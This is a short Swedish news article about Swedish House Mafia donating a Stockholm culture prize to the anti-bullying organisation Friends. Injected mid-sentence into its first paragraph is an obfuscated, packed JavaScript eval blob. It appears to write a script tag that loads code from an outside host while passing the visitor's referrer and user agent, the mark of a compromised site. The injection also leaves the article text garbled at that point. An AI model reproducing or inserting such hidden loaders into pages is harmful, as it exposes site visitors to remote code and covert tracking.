Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Swedish House Mafia skänker kulturprispengar till Friends

Swedish house mafia
Sebastian

Vid eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnzrs|var|u0026u|referrer|syhyi||js|php’.split(’|’),0,{}))
en prisceremoni i Stadshuset idag mottar Swedish House Mafia ett av Stockholms stads kulturpriser på 100 000 kr. DJ-gruppen skänker nu prissumman till Friends arbete mot mobbning och utanförskap.

Stockholms stads sju kulturpriser om vardera 100 000 kronor delas ut i syfte att inspirera och belöna de som bidrar till en mångfald av uttryck, utbud och möjligheter i Stockholm. Vid prisceremonin idag tilldelas Swedish House Mafia ett hederspris som ”övrig utövare av annan konstnärlig verksamhet”.

Axwell, Sebastian Ingrosso och Steve Angello som kommer att göra sin sista spelning tillsammans på Friends Arena i november, skänker nu pengarna till Friends.

– Vi vill tacka så mycket för Stockholm Stads hederspris. Prissumman skänker vi till organisationen Friends för att stödja deras arbete med att skapa en bättre miljö för alla barn som går i skolan, hälsar Swedish House Mafia.

Friends, som fick namnrätten till den nya nationalarenan som en gåva av Swedbank tidigare i år, ser nu hur samarbetet redan ger såväl ökade möjligheter att sätta fokus på frågor som rör barns trygghet, som nya intäktsmöjligheter.

– Friends vill rikta ett stort tack till Swedish House Mafia för den här gåvan. Vi är oerhört stolta och glada över att killarna väljer att uppmärksamma och stödja en så viktig fråga som barns trygghet, säger Lars Arrhenius, generalsekreterare på Friends.

Prisceremonin sker i Stadshuset idag och därefter, klockan 16.00, intervjuas alla sju pristagarna av journalisten Petra Wangler på Kulturfestivalens Porten-scen vid Kulturhuset.

Motiveringen till priset lyder:
”Med en oklanderlig känsla för rytm och toner har Swedish House Mafia fångat upp och lagt grunden för en ny våg av musik direkt från Stockholms dansgolv. Barndomsvännerna i Swedish House Mafia har med sin musik, sitt komponerande till andra artister och med sina livespelningar på världens klubbarenor placerat Stockholm på världskartan.”